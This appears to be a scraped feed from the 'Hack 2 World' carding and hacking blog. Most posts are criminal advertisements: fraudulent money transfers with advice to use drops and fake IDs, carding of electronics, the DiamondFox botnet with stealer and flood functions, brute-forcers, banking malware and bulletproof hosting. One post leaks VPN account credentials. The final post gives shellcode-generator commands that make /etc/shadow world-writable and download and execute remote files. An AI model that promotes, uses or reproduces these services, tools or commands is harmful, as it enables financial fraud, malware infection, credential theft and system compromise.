Quantcast
Channel: Hack 2 World ®
Viewing all 421 articles
Browse latest View live

Westernunion Transfer - Shipping Electronics - Login Bank & Bank Transfer - Paypal - Moneygram Transfer

May 19, 2015, 1:04 pm
$
0
0
My Yahoo :- internet.zer0@yahoo.com
My Jabber :- Z3r0@exploit.im

Doing Western Union Transfer, Money gram and Bank transfer and shipping electronics and all transfer will only be completed after payment confirmation. In escrow money transfer as soon as admin confirms that payment has been received, After payment in Western Union and in Money Gram you will get payment receiver Info in case of Western Union MTCN which you can pick when you want.

All western union, money gram are completed within few minutes once payment is confirmed and depending if I or my partner is online. I do transfer online and I use my private method to do the transfers so the transfer will be instant. All bank transfers take a couple of hours like 8-12 or may be some more time to be fully completed.

I do not accept 50% / 50% or any %. The prices below are final and I won't negotiate because I don't have time and I make enough money from this so I don't care if you buy or not from me, Payment methods are Bitcoin and Perfect Money only so don't ask for any other payment option i can do western union to you so i can do it to myself to so don't ask for western union as payment option but if you pay me via escrow and admin accepts western Union and will pay me in Bitcoin or in Perfect Money then we can deal but you have to ask admin before if he is comfortable with this.

Also when I transfer for Western Union or Money Gram I need the following details from you. I suggest you use drop or fake info and ID's for verification when picking up money.


Western Union RATES:

$2000 WU for $500 BTC or PM Only
$3000 WU for $600 BTC or PM Only
$4500 WU for $700 BTC or PM Only
$5500 WU for $800 BTC or PM Only
$6000 WU for $900 BTC or PM Only
$8000 WU for $1000 BTC or PM Only

ATTENTION (Western Union): * Amounts over 5,000 $ will be sent in two rounds (random amount, not equal). For example: 5600 can be sent as 2,200 $ and $3,400 $.

Bank Transfer RATES:

$2500 Bank Transfer for $500 BTC or PM Only
$3500 Bank Transfer for $680 BTC or PM Only
$4500 Bank Transfer for $880 BTC or PM Only
$5500 Bank Transfer for $990 BTC or PM Only
$6000 Bank Transfer for $1000 BTC or PM Only
$7000 Bank Transfer for $1500 BTC or PM Only

ATTENTION (Bank Wire): * Before accepting this payment method, please check your bank account's limitation!

MoneyGram RATES:

$2000 MoneyGram for $400 BTC or PM Only 
$3000 MoneyGram for $500 BTC or PM Only
$4000 MoneyGram for $600 BTC or PM Only
$5000 MoneyGram for $700 BTC or PM Only
$6000 MoneyGram for $1000 BTC or PM Only

Neteller account topup Rates:
$2000 Neteller Topup for $500 BTC or PM Only
$3000 Neteller Topup for $650 BTC or PM Only
$4000 Neteller Topup for $700 BTC or PM Only
$5000 Neteller Topup for $850 BTC or PM Only
$6000 Neteller Topup for $1000 BTC or PM Only

Introduction

Hello World

I'm offering you a good service. I can ship to your adress safely many stuff, for example, Iphone5 or Macbook pro,
I'm also good at Ebay Carding, so i can card you what you want up to 100 000$ real value daily. I can card all ebay : ebay.co.uk , ebay.in, ebay.com ,ebay.fr, etc

Also, i can card almost any site online and without forgetting Amazon

I can ship to almost any country , even India, Nigeria,Indonesia,Phillipines,etc

PS: THERE IS NO TAX/CUSTOM DUTY TO ANY COUNTRY !! how is that possible? continue your reading, its explained at the bottom

1)Instore Carding

What is Instore Carding? In brief, it is to go to physically to the shop, for example Apple Store, and to shop with fake cc. But do not think that it is easy.
So for my service, those stuff above, the SAME DAY of payment or escrow confirmation, I simply go the store and Instore Card them and ship them.
For shipping , to ANY country , using Dhl or Ups or Fedex :

Description

We have all kinds of IOS and Android Pin packed devices in stock with all default accessories.
All the devices we are supplying are factory unlocked and compatible with all SIM or any network carrier...........

Apple iPhone 6 Plus - 128GB - Gold/Silver (Latest Model)Factory Unlocked
1 piece = $350
3 pieces = $650
5 pieces = $900
10 pieces = $2,000
15 pieces = $3,900

Apple iPhone 6 - 64GB - Gold/Silver (Latest Model)Factory Unlocked
1 piece = $300
3 pieces = $600
5 pieces = $800
10 pieces = $1,500
15 pieces = $2,300

Laptops ( Acer, Apple, Hp, Dell only) price $350 single piece 
Laptops (Macbook pro, Alienware )price $500 single piece 
Games ( Playstation , Xbox360) price $400 single piece
Iphone 4s any memory price $200 AND Iphone 5 $300 any memory
Blackberry any model $200 and Blackberry z10 $300
Ipad or other tablets price $300
Other stuffs if real price under $1000 then my fee is $200, if its below 2000$ then my fee is $350, and its higher then 2000$ then my fee will be $500

My Yahoo :- internet.zer0@yahoo.com
My Jabber :- Z3r0@exploit.im

Search

Email Checker - Asec-Check v1 By Security Alshaab

February 21, 2015, 3:02 pm

Hack 2 World - Hackers Spammers Carders Sellers Buyers - Donate Day For You

May 24, 2015, 5:20 pm
$
0
0
Hello World

Hack 2 World - Hackers Spammers Carders Sellers Buyers We Need You - Donate Day For You ;)

Donate Day For Your Future :p

Donate For Hack 2 World,We Need Your Help Donate Some Money For Hack 2 World Domain

I Need Domain For My Blog And Some Money For Hack2Wwworld Forum

Donate :- PerfectMoney And Bitcoin

PerfectMoney 


Our PerfectMoney Account :- 

Dollor :- U4622371
Euro :- E5944307


Our Bitcoin Account :- 


14JwLyhYEQCatk8Epy5J2pyVFuSb7KRZnr

Advance Thanks To All, Plz Help Us And Donate Some Money :)

Hack 2 World Admin :- Joe Root :)


Gorynych Botnet / DiamondFox Botnet

July 1, 2015, 5:20 pm
$
0
0





- Protection: VMProtect
- Builder language: VB6 P-Code

Fixed Task viewer viariable issue
Fixed dangerous upload vulnerability on C&C
Fixed Logout issue on the C&C
Fixed Keylogger and update function issue
Added installation options on the bot builder
Added ramdom logo on the C&C login
Added HKCU startup method
Added Winlogon Startup Method
Added custom install name
Added %TEMP% installation dir
Added %WINDIR% installation dir
Added %PROGRAMFILES% installation dir
Added optional melt function
Added startup persistance option
Added automatic keylogger installation option
Added automatic PoS grabber installation option
Added automatic grabbers option
Added harder anti-crack methods on the bot builder
Removed feedback tab

Functions:

  • Download and execute (in memory) 
  • Download and execute (on disk) 
  • Open website (Visible) 
  • Open website (Hidden) 
  • UDP Flood 
  • HTTP Flood 
  • Enable / Disable Host Editor 
  • Enable / Disable PoS Grabber 
  • Spam with bots (inbox)
  • Bitcoin Wallet Stealer
  • Facebook / Twitter Message spread
  • Firefox homepage changer
  • Enable / Disable Keylogger 
  • Take screenshot 
  • Password Grabber (Chorme, Firefox, Opera, IExplore, Safari) 
  • FTP Grabber (Filezilla) 
  • Instant Messaging Password Grabber
  • Grab EMAIL, SMTP, POP3 and IMAP 
  • Update bot 
  • Uninstall

Builder Options:

  • Fallback panel.
  • Custom Connection time.
  • Encrypted connections.
  • Encrypted data inside the bot.
  • Custom User-agent. 
  • Anti-Sysanalizer. 
  • Anti-VirtualBox. 
  • Anti-VMWare. 
  • Anti-Anubis. 
  • Anti-OllyDBG. 
  • Disable Regedit. 
  • Anti-Sandboxie. 
  • Anti-Norman. 
  • Anti-Researchers.
  • Anti-Malwr.com. 
  • Anti-Wine. 
  • Disable Taskmanager. 
  • USB Spread. 
  • Spread Dropbox. 
  • File Extention Selector
  • User Acount Control Forcer.
  • Custom install name
  • Custom install path
  • HKCU startup method
  • Winlogon startup method
  • Startup folder method
  • Optional melt function
  • Startup persistance
  • Automatic keylogger installation
  • Automatic Point-Of-Sales grabber installation
  • Automatic grabbers routine

Extra Info:

  • Very stable connection.
  • Random Access Memory plugins execution
  • Works with any crypter.
  • Lite Ring3 RootKit (Hide registry keys).
  • No need dependencies.
  • Detect IP, country, antivirus, firewall, cpu, gpu, ram, memory, disk, user, PC name, hwid, software architecture and status. 
  • Ability to send individual commands for each bot. 
  • Ability to select the bots by country, status, by type or all.
  • Statistics. (Map, reports, status, operating system, host status, keylogger status, PoS status, System Architecture, antivirus and firewall) 
  • Real-time Connection Notifications.
  • Communication between the bot and the panel are encrypted. 
  • Spam is made for bots, not by the webpanel.
  • Based on plugins so more features will be added in the future.
  • Working on all OS. (XP, vista, 7, 8, 8.1) (We are starting support for Windows X)

Price :- 100$ 

Files Panel + Builder + Other Files 

BOTNET SELLER YAHOO AND JABBER ID

Jabber :- z3r0@exploit.im

Yahoo :- internet.zer0@yahoo.com


G2A GoldMine - Make 1000$ Every Month

July 6, 2015, 8:19 pm
$
0
0
Hello
I want to introduce you with a site where you can sell games( your own or this which g2a marketplace sell). All you need to do is register here and start sharing your refferal link to your gamers friends who buy games and dont know that this site have extremely sales for many games, or to a completely strangers on forums, facebook, twitter, chats,... You need to have some good niche about selling games like: Weekly sale, amazing cheap games, can you find cheaper fifa 14? look here... and so on. At the start you need to be active so you get many people in your team, this mean they buy or join after you and if they share this site too, you get some money of them too. And this is what now happened to me, i was sharing this site for a month and get many people in my team see picture and now i only sit down and watch how money comes, i didnt share this page for a month but my refferals did and i get more than 300€ by now and this amount is get bigger and bigger every day. So this is a life time opportunity if you want to get fast money easy.
Thanks for reading me and if you have any questions pls send me a private message and i will answer you






COME JOIN US LINK HERE :- SITE LINK

Bulk FTP Admin Cracked By BaNNeD

July 11, 2015, 2:17 am

Private Tools - SMTP RDP SSH Cpanels Wordpress Scanners Brutforces Botnets Virus For Sell - Trusted Seller

August 4, 2015, 1:07 pm
$
0
0
Private Scanners Linux Based And Windows Based

TeamViewer Proof Files <<==

IP Smtp Scanner :- 200$ (BTC AND PM)
Domain Smtp Scanner :- 250$ (BTC AND PM)
Domain Smtp Scanner With Mail Support :- 250$ (BTC AND PM)
SSH Scanner :- 100$ (BTC AND PM)
Wordpress Scanner :- 200$ (BTC AND PM)
Zimbra Proxy Server Scanner :- 200$ (BTC AND PM)
Plesk Panel Scanner :- 250$ (BTC AND PM)
Wordpress Scanner :- 200$ (BTC AND PM)

Cpanel Scanner :- 500$ (BTC AND PM)
Mirc Based Scanner Hacked :- ( Shells FTPs SMTPs ) Write in Perl Support 60 Jackes :- 500$ (BTC AND PM)

Root Scanner :- 500$ (BTC AND PM)
RDP Scanner :- 500$ (BTC AND PM) This Scanner Support SMTPS To

SMTP Bruter :- 50$ (BTC AND PM)
SSH Bruter :- 50$ (BTC AND PM)
0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0

Other Stuff For Sell

Malwares :- All Type Banking Botnets - Stealers - Rats (Citadel - Zeus - Pony - Diamond Fox And Others
Crypter :- Private .NET Crypter
Hosting :- Private BulletProof Hosting For Crime (Porn - Botnets And Other)

Spamming - Spam - Tutorial's

How to Spam Any Bank 
How to Spam Fullz
How to Spam With SMTPS RDPS SSH ROOTS PHP MAILERS SHELLS
How to Make Normal Scam Pages
How to Make Encrypted Scam Pages 100% Fud

And Other Stuff What you need Hacking Spamming Codeing Programming

0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0

My Jabber :- z3r0@exploit.im

My Yahoo :- internet.zer0@yahoo.com

MY ICQ :- 691768633

What is Rhyliv Forum? And How Will Everything Work

August 12, 2015, 12:07 pm
$
0
0


I'd like to first welcome everyone to Rhyliv

Rhyliv is a social trading network meant to facilitate transactions between users. Transactions are instant, no fees to transfer funds from one user to another. All transactions/trades/deals are to use the Rhyliv's currency (aka Rhys or Γ).

We're in the process of getting everything up and running. That means, everything but the sub-categories to classify trades to make it easier for users to search what they need/would like to sell.

That doesn't mean you cannot give your piece of mind. If you have any suggestions/ideas, post them in the Suggestions sub-forum.

 All Categories :- 

Arena / PVP
Art
Books
Computers
Electronics
Gambling
Jobs
Miscellaneous
Music
Services
Videos
Video Games
Virtual Items

WEBSITE FORUM LINK <<== Click Here


Search

Purevpn Premium Accounts

August 15, 2015, 3:35 pm
$
0
0
Hello Hack2wwworld Family

I am share my vpn premium username and password

ScreenShot [From My Pc]


Countries VPN

Albania, Argentina, Armenia, Aruba, Australia, Austria, Bahamas, Bahrain, Belgium, Belize, Bosnia, Brazil, Brunei, Bulgaria, Canada, Chile, China, Colombia, Costa Rica, Croatia, Czech Republic, Denmark, Egypt, Estonia, Finland, France, Georgia, Germany, Ghana, Greece, Hong Kong, Hungary, Iceland, India, Indonesia, Ireland, Isle of Man, Italy, Japan, Jordan, Kenya, Kuwait, Latvia, Lebanon, Liechtensteim, Lithuania, Luxembourg, Malaysia, Malta, Mexico, Moldova, Monaco, Montenegro, Netherlands, New Zealand, Nigeria, Norway, Oman, Panama, Peru, Philippines, Poland, Qatar, Romania, Russia, Saudi Arabia, Serbia, Seychelles, Singapore, Slovakia, Slovenia, South Africa, South Korea, Spain, Sweden, Switzerland, Syria, Taiwan, Thailand, Turkey, UAE, UK, Ukraine, USA, Venezuela, Vietnam & Yemen

Account

Username : purevpn0s697093
Password : ho147ntx
Account Status : Account Has Been Disabled :)

New Account 1 Mouth [2015/05/11]

Username : purevpn0s698105
Password : jhhvexzg
Account Status :  Account Has Been Disabled

New Account & Port Fowarding & High ISP [2015-05-15]

username : purevpn0s705749
password : hdxckgy1 
Web Protection Addon
 
Proof :

 
Addon Key

Key : ZsE41

PPTP/L2TP Manual Setup Hostname List]

UK

uk1.purevpn.net

uk3.purevpn.net

uk5.purevpn.net

uk7.purevpn.net

uk8.purevpn.net

uk9.purevpn.net

uk11.purevpn.net

uk12.purevpn.net

uk13.purevpn.net

uk14.purevpn.net

uk15.purevpn.net

uk16.purevpn.net

uk17.purevpn.net

uk18.purevpn.net

uk19.purevpn.net

uk20.purevpn.net

uk21.purevpn.net

uk22.purevpn.net

uk23.purevpn.net

uk24.purevpn.net

uk25.purevpn.net

uk26.purevpn.net

uk27.purevpn.net

uk28.purevpn.net

uk29.purevpn.net

uk30.purevpn.net

uk31.purevpn.net

uk32.purevpn.net

uk33.purevpn.net

uk34.purevpn.net

uk4.purevpn.net

uk10.purevpn.net

uk2.purevpn.net

uk6.purevpn.net

uk35.purevpn.net

uk36.purevpn.net

uk37.purevpn.net

uk38.purevpn.net

uk39.purevpn.net

uk40.purevpn.net

uk41.purevpn.net

uk42.purevpn.net

uk43.purevpn.net

uk44.purevpn.net

uk45.purevpn.net

uk46.purevpn.net

uk47.purevpn.net

uk48.purevpn.net

uk49.purevpn.net

uk50.purevpn.net

uk51.purevpn.net

uk52.purevpn.net

uk53.purevpn.net

uk54.purevpn.net

uk55.purevpn.net

uk56.purevpn.net

uk57.purevpn.net

uk58.purevpn.net

uk59.purevpn.net

uk60.purevpn.net

uk1.world4china.com (For users in china)

uk2.world4china.com (For users in china)

uk3.world4china.com (For users in china)

uk4.world4china.com (For users in china)

uk5.world4china.com (For users in china)

uk6.world4china.com (For users in china)

uk7.world4china.com (For users in china)

uk8.world4china.com (For users in china)

uk9.world4china.com (For users in china)

uk10.world4china.com (For users in china)Virtual Servers ViaUSA : vlus-ukl1.purevpn.net

South Africa : vlsa-ukl1.purevpn.net

Brazil : vlbr-ukl1.purevpn.net

USA

us1.purevpn.net

us10.purevpn.net

us7.purevpn.net

us13.purevpn.net

us17.purevpn.net

us18.purevpn.net

us19.purevpn.net

us20.purevpn.net

us21.purevpn.net

us22.purevpn.net

us23.purevpn.net

us24.purevpn.net

us25.purevpn.net

us26.purevpn.net

us27.purevpn.net

us28.purevpn.net

us29.purevpn.net

us30.purevpn.net

us11.purevpn.net

us4.purevpn.net

us8.purevpn.net

us31.purevpn.net

us32.purevpn.net

us33.purevpn.net

us34.purevpn.net

us35.purevpn.net

us36.purevpn.net

us37.purevpn.net

us38.purevpn.net

us39.purevpn.net

us40.purevpn.net

us41.purevpn.net

us42.purevpn.net

us43.purevpn.net

us44.purevpn.net

us45.purevpn.net

us46.purevpn.net

us47.purevpn.net

us48.purevpn.net

us49.purevpn.net

us50.purevpn.net

us51.purevpn.net

us12.purevpn.net

us2.purevpn.net

us52.purevpn.net

us53.purevpn.net

us54.purevpn.net

us55.purevpn.net

us56.purevpn.net

us57.purevpn.net

us58.purevpn.net

us59.purevpn.net

us60.purevpn.net

us61.purevpn.net

us62.purevpn.net

us63.purevpn.net

us64.purevpn.net

us65.purevpn.net

us15.purevpn.net

us3.purevpn.net

us9.purevpn.net

us66.purevpn.net

us67.purevpn.net

us68.purevpn.net

us69.purevpn.net

us70.purevpn.net

us71.purevpn.net

us72.purevpn.net

us73.purevpn.net

us74.purevpn.net

us75.purevpn.net

us76.purevpn.net

us77.purevpn.net

us78.purevpn.net

us5.purevpn.net

us79.purevpn.net

us80.purevpn.net

us81.purevpn.net

us82.purevpn.net

us83.purevpn.net

us84.purevpn.net

us85.purevpn.net

us86.purevpn.net

us87.purevpn.net

us88.purevpn.net

us89.purevpn.net

us16.purevpn.net

us90.purevpn.net

us91.purevpn.net

us92.purevpn.net

us93.purevpn.net

us94.purevpn.net

us95.purevpn.net

us96.purevpn.net

us97.purevpn.net

us98.purevpn.net

us99.purevpn.net

us100.purevpn.net

us6.purevpn.net

us101.purevpn.net

us102.purevpn.net

us103.purevpn.net

us104.purevpn.net

us105.purevpn.net

us106.purevpn.net

us107.purevpn.net

us108.purevpn.net

us109.purevpn.net

us110.purevpn.net

us111.purevpn.net

us14.purevpn.net

us1.world4china.com (For users in china)

us2.world4china.com (For users in china)

us3.world4china.com (For users in china)

us4.world4china.com (For users in china)

us5.world4china.com (For users in china)

us6.world4china.com (For users in china)

us7.world4china.com (For users in china)

us8.world4china.com (For users in china)

us9.world4china.com (For users in china)

us10.world4china.com (For users in china)

us11.world4china.com (For users in china)Virtual Servers ViaAsia : vlap-ustx1.purevpn.net

Brazil : vlbr-usvc1.purevpn.net

South Africa : vlsa-ussf1.purevpn.net

Australia

au1.purevpn.net

au2.purevpn.net

au3.purevpn.net

au4.purevpn.net

au5.purevpn.net

au6.purevpn.net

au1.world4china.com (For users in china)

Canada

ca1.purevpn.net

ca2.purevpn.net

ca3.purevpn.net

ca4.purevpn.net

ca5.purevpn.net

ca6.purevpn.net

ca7.purevpn.net

ca8.purevpn.net

ca9.purevpn.net

ca10.purevpn.net

ca11.purevpn.net

ca12.purevpn.net

cav1.purevpn.net

ca1.world4china.com (For users in china)

ca2.world4china.com (For users in china)

ca3.world4china.com (For users in china)

France

fr1.purevpn.net

fr2.purevpn.net

fr3.purevpn.net

fr4.purevpn.net

fr1.world4china.com (For users in china)Virtual Servers ViaEurope : vleu-fr1.purevpn.net

Germany

de1.purevpn.net

de2.purevpn.net

de3.purevpn.net

de4.purevpn.net

de5.purevpn.net

de6.purevpn.net

de7.purevpn.net

de8.purevpn.net

de9.purevpn.net

de10.purevpn.net

de11.purevpn.net

de12.purevpn.net

de13.purevpn.net

de14.purevpn.net

de15.purevpn.net

de16.purevpn.net

de17.purevpn.net

de18.purevpn.net

de1.world4china.com (For users in china)

de2.world4china.com (For users in china)

Ireland

ie1.purevpn.net

ie2.purevpn.net

ie3.purevpn.net

ie4.purevpn.net

ie1.world4china.com (For users in china)Virtual Servers ViaUSA : vlus-ie1.purevpn.net

Luxembourg

lu1.purevpn.net

lu2.purevpn.net

lu3.purevpn.net

lu4.purevpn.net

lu5.purevpn.net

lu6.purevpn.net

lu2.world4china.com (For users in china)

lu2.world4china.com (For users in china)

Malaysia

my1.purevpn.net

my2.purevpn.net

my3.purevpn.net

my4.purevpn.net

my1.world4china.com (For users in china)

Netherlands

nl1.purevpn.net

nl2.purevpn.net

nl3.purevpn.net

nl4.purevpn.net

nl5.purevpn.net

nl6.purevpn.net

nl7.purevpn.net

nl8.purevpn.net

nl9.purevpn.net

nl10.purevpn.net

nl11.purevpn.net

nl12.purevpn.net

nl13.purevpn.net

nl14.purevpn.net

nl15.purevpn.net

nl1.world4china.com (For users in china)

nl2.world4china.com (For users in china)

Panama

pa1.purevpn.net

pa2.purevpn.net

pa1.world4china.com (For users in china)

vlap-pa1.purevpn.net

Romania

ro1.purevpn.net

ro2.purevpn.net

ro3.purevpn.net

ro4.purevpn.net

ro1.world4china.com (For users in china)

Russia

ru1.purevpn.net

ru2.purevpn.net

ru3.purevpn.net

ru4.purevpn.net

ru5.purevpn.net

ru6.purevpn.net

ru1.world4china.com (For users in china)Virtual Servers ViaUSA : vlus-ru1.purevpn.net

Singapore

sg1.purevpn.net

sg-2.purevpn.net

sg2.purevpn.net

sg3.purevpn.net

sg4.purevpn.net

sg5.purevpn.net

sg6.purevpn.net

sg7.purevpn.net

sg8.purevpn.net

sg9.purevpn.net

sg10.purevpn.net

sg1.world4china.com (For users in china)

sg2.world4china.com (For users in china)

Sweden

se1.purevpn.net

se2.purevpn.net

se3.purevpn.net

se4.purevpn.net

se5.purevpn.net

se6.purevpn.net

se7.purevpn.net

se8.purevpn.net

se9.purevpn.net

se10.purevpn.net

se11.purevpn.net

se12.purevpn.net

se13.purevpn.net

se14.purevpn.net

se15.purevpn.net

se1.world4china.com (For users in china)Virtual Servers ViaUSA : vlus-se1.purevpn.net

Switzerland

ch1.purevpn.net

ch2.purevpn.net

ch3.purevpn.net

ch4.purevpn.net

ch1.world4china.com (For users in china)

Turkey

tr1.purevpn.net

tr2.purevpn.net

tr3.purevpn.net

tr4.purevpn.net

tr1.world4china.com (For users in china)Virtual Servers ViaUSA : vlus-tr1.purevpn.net

Iceland

is1.purevpn.net

Brazil

br1.purevpn.net

br2.purevpn.net

br1.world4china.com (For users in china)

Bulgaria Virtual Servers Via USA : bg1.purevpn.net

USA : bg2.purevpn.net

bg1.world4china.com (For users in china)

Costa Rica

cr1.world4china.com (For users in china)Virtual Servers ViaUSA : cr1.purevpn.net

USA : cr2.purevpn.net

Latvia

lv1.world4china.com (For users in china)Virtual Servers ViaUSA : lv1.purevpn.net

USA : lv2.purevpn.net

Egypt

eg1.purevpn.net

eg2.purevpn.net

eg1.world4china.com (For users in china)Virtual Servers ViaUSA : vlus-eg1.purevpn.net

Hungry

hu1.world4china.com (For users in china)Virtual Servers ViaUSA : hu1.purevpn.net

USA : hu2.purevpn.net

Hong Kong

hk1.purevpn.net

hk2.purevpn.net

hk3.purevpn.net

hk4.purevpn.net

hk1.world4china.com (For users in china)

Ukraine

ua1.world4china.com (For users in china)Virtual Servers ViaUSA : ua1.purevpn.net

USA : ua2.purevpn.net

Italy

it1.purevpn.net

it2.purevpn.net

it1.world4china.com (For users in china)

South Africa

za1.purevpn.net.

za1.world4china.com (For users in china)

Chile

cl1.world4china.com (For users in china)Virtual Servers ViaBrazil : cl1.purevpn.net

Indonesia

idn1.purevpn.net

idn1.world4china.com (For users in china)

Taiwan

tw1.world4china.com (For users in china)Virtual Servers ViaAsia : tw1.purevpn.net

Thailand

th1.world4china.com (For users in china)Virtual Servers ViaAsia : th1.purevpn.net

South Korea

kr1.purevpn.net

kr.world4china.com (For users in china)

Japan

jp1.world4china.com (For users in china)Virtual Servers ViaAsia : jp1.purevpn.net

New Zealand

nz1.world4china.com (For users in china)Virtual Servers ViaAsia : nz1.purevpn.net
China

cn1.purevpn.net

cn1.world4china.com (For users in china)

Mexico

mx1.world4china.com (For users in china)Virtual Servers ViaBrazil : mx1.purevpn.net

Argentina

ar1.world4china.com (For users in china)Virtual Servers ViaBrazil : ar1.purevpn.net

Belgium

be1.world4china.com (For users in china)Virtual Servers ViaEurope : be1.purevpn.net

Norway

no1.world4china.com (For users in china)Virtual Servers ViaEurope : no1.purevpn.net

Denmark

dk1.world4china.com (For users in china)

dk1.purevpn.netVirtual Servers ViaEurope : dk1.purevpn.net

Poland

pl1.purevpn.net

pl1.world4china.com (For users in china)

Vietnam Virtual Servers Via Asia : vlap-vn1.purevpn.net

Philippines

ph1.world4china.com (For users in china)Virtual Servers ViaAsia : vlap-ph1.purevpn.net

Czech Republic

cz1.purevpn.net

cz1.world4china.com (For users in china)

Spain

es1.purevpn.net

Finland

fi1.purevpn.net

Lithuania

lt1.purevpn.net

Austria

at1.purevpn.net

Slovakia

sk1.purevpn.net

Albania

al1.purevpn.net

Estonia

ee1.purevpn.net

Moldova

md1.purevpn.net

Jordan Virtual Servers Via USA : vlus-jo1.purevpn.net

Kuwait Virtual Servers Via USA : vlus-kw1.purevpn.net

Serbia

rs1.purevpn.net

Bosnia

ba1.purevpn.net

Liechtenstein

li1.purevpn.net

Monaco

mn1.purevpn.net

Slovenia

si1.purevpn.net

Montenegro

me1.purevpn.net

Malta

mt1.purevpn.net

Croatia

hr1.purevpn.net

Georgia

ge1.purevpn.net

Brunei

bn1.purevpn.net

Greece

gr1.purevpn.net

India

in1.purevpn.net

Oman

om1.purevpn.net

Bahrain

bh1.purevpn.net

UAE

ae1.purevpn.net

Ghana

gh1.purevpn.net

Nigeria

ng1.purevpn.net

Peru

pe1.purevpn.net

Colombia

co1.purevpn.net

Cambodia

kh1.pointtoserver.com

Azerbaijan

az1.pointtoserver.com

Ecuador

ec1.pointtoserver.com

Jamaica

jm1.pointtoserver.com

Cuba

cu1.pointtoserver.com

Puerto Rico

pr1.pointtoserver.com

Portugal

pt1.pointtoserver.com

Ethiopia

et1.pointtoserver.com

Mauritius

mu1.pointtoserver.com

British Virgin Islands

vg1.pointtoserver.com

Cyprus

cy1.pointtoserver.com

Pakistan

pk1.pointtoserver.com

Armenia

am1.purevpn.net

Aruba

aw1.pointtoserver.com

Belize

bz1.pointtoserver.com

Bahamas

bs1.purevpn.net

Isle of Man

im1.pointtoserver.com

Lebanon

lb1.purevpn.net

Macau

mo1.pointtoserver.com

Morroco

ma1.pointtoserver.com

Kenya

ke1.pointtoserver.com

Saudi Arabia

sa1.pointtoserver.com

Qatar

qa1.pointtoserver.com

Venezuela

ve1.purevpn.net

Seychelles

sc1.pointtoserver.com

Syria

sy1.pointtoserver.com

Yemen

ym1.pointtoserver.com

For Open Vpn

Windows :- http://www.purevpn.com/vpn-software-for-windows.php

Mac :- http://www.purevpn.com/vpn-software-for-mac.php

Android :- https://play.google.com/store/apps/details?id=com.gaditek.purevpnics










OWASP ZSC Shellcoder - Generate Customized Shellcodes

August 18, 2015, 9:23 am
$
0
0

OWASP ZSC is an open source software in python language which lets you generate customized shellcodes for listed operation systems. This software can be run on Windows/Linux&Unix/OSX and others OS under python 2.7.x.

Description

Usage of shellcodes

Shellcodesare small codes in assembly which could be use as the payload in software exploiting. Other usages are in malwares, bypassing antiviruses, obfuscated codes and etc.

Why use OWASP ZSC ?

According to other shellcode generators same as metasploit tools and etc, OWASP ZSC using new encodes and methods which antiviruses won't detect. OWASP ZSC encoderes are able to generate shellcodes with random encodes and that's lets you to get thousands new dynamic shellcodes with same job in just a second,that means you will not get a same code if you use random encodes with same commands, And that make OWASP ZSC one of the bests! otherwise it's gonna generate shellcodes for many operation systems in next versions.

Help Menu
Switches:
-h, --h, -help, --help => to see this help guide
-os => choose your os to create shellcode
-oslist   => list os for switch -os
-o => output filename
-job => what shellcode gonna do for you ?
-joblist => list of -job switch
-encode => generate shellcode with encode
-types => types of encode for -encode switch
-wizard => wizard mod

-update => check for update
-about => about software and developers.
With these switch you can see the oslist,encode types and functions [joblist] to generate your shellcode.
OS List "-oslist
[+] linux_x86
[+] linux_x64
[+] linux_arm
[+] linux_mips
[+] freebsd_x86
[+] freebsd_x64
[+] windows_x86
[+] windows_x64
[+] osx
[+] solaris_x86
[+] solaris_x64
Encode Types "-types
[+] none
[+] xor_random
[+] xor_yourvalue
[+] add_random
[+] add_yourvalue
[+] sub_random
[+] sub_yourvalue
[+] inc
[+] inc_timesyouwant
[+] dec
[+] dec_timesyouwant
[+] mix_all
Functions "-joblist
[+] exec('/path/file')
[+] chmod('/path/file','permission number')
[+] write('/path/file','text to write')
[+] file_create('/path/file','text to write')
[+] dir_create('/path/folder')
[+] download('url','filename')
[+] download_execute('url','filename','command to execute')
[+] system('command to execute')
[+] script_executor('name of script','path and name of your script in your pc','execute command')

Now you are able to choose your operation system, function, and encode to generate your shellcode, But all of these features are not activated yet, so you have to look up this table HERE to see what features are activated.


For example, this part of table telling us all functions for linux_x86 is activated, But Encodes [xor_random, xor_yourvalue, add_random, add_yourvalue, sub_random, sub_yourvalue, inc, inc_timesyouwant, dec, dec_timesyouwant] are just activated for chmod() function.

Examples
>zsc -os linux_x86 -encode inc -job "chmod('/etc/passwd','777')" -o file
>zsc -os linux_x86 -encode dec -job "chmod('/etc/passwd','777')" -o file
>zsc -os linux_x86 -encode inc_10 -job "chmod('/etc/passwd','777')" -o file
>zsc -os linux_x86 -encode dec_30 -job "chmod('/etc/passwd','777')" -o file
>zsc -os linux_x86 -encode xor_random -job "chmod('/etc/shadow','777')" -o file.txt
>zsc -os linux_x86 -encode xor_random -job "chmod('/etc/passwd','444')" -o file.txt
>zsc -os linux_x86 -encode xor_0x41414141 -job "chmod('/etc/shadow','777')" -o file.txt
>zsc -os linux_x86 -encode xor_0x45872f4d -job "chmod('/etc/passwd','444')" -o file.txt
>zsc -os linux_x86 -encode add_random -job "chmod('/etc/passwd','444')" -o file.txt
>zsc -os linux_x86 -encode add_0x41414141 -job "chmod('/etc/passwd','777')" -o file.txt
>zsc -os linux_x86 -encode sub_random -job "chmod('/etc/passwd','777')" -o file.txt
>zsc -os linux_x86 -encode sub_0x41414141 -job "chmod('/etc/passwd','444')" -o file.txt
>zsc -os linux_x86 -encode none -job "file_create('/root/Desktop/hello.txt','hello')" -o file.txt
>zsc -os linux_x86 -encode none -job "file_create('/root/Desktop/hello2.txt','hello[space]world[space]!')" -o file.txt
>zsc -os linux_x86 -encode none -job "dir_create('/root/Desktop/mydirectory')" -o file.txt
>zsc -os linux_x86 -encode none -job "download('http://www.z3r0d4y.com/exploit.type','myfile.type')" -o file.txt
>zsc -os linux_x86 -encode none -job "download_execute('http://www.z3r0d4y.com/exploit.type','myfile.type','./myfile.type')" -o file.txt
#multi command
>zsc -os linux_x86 -encode none -job "download_execute('http://www.z3r0d4y.com/exploit.type','myfile.type','chmod[space]777[space]myfile.type;sh[space]myfile.type')" -o file.txt
>zsc -os linux_x86 -encode none -job "script_executor('script.type','D:\\myfile.type','./script.type')" -o file.txt
>zsc -os linux_x86 -encode none -job "script_executor('z3r0d4y.sh','/root/z3r0d4y.sh','sh[space]z3r0d4y.sh')" -o file.txt
>zsc -os linux_x86 -encode none -job "script_executor('ali.py','/root/Desktop/0day.py','chmod[space]+x[space]ali.py;[space]python[space]ali.py')" -o file.txt
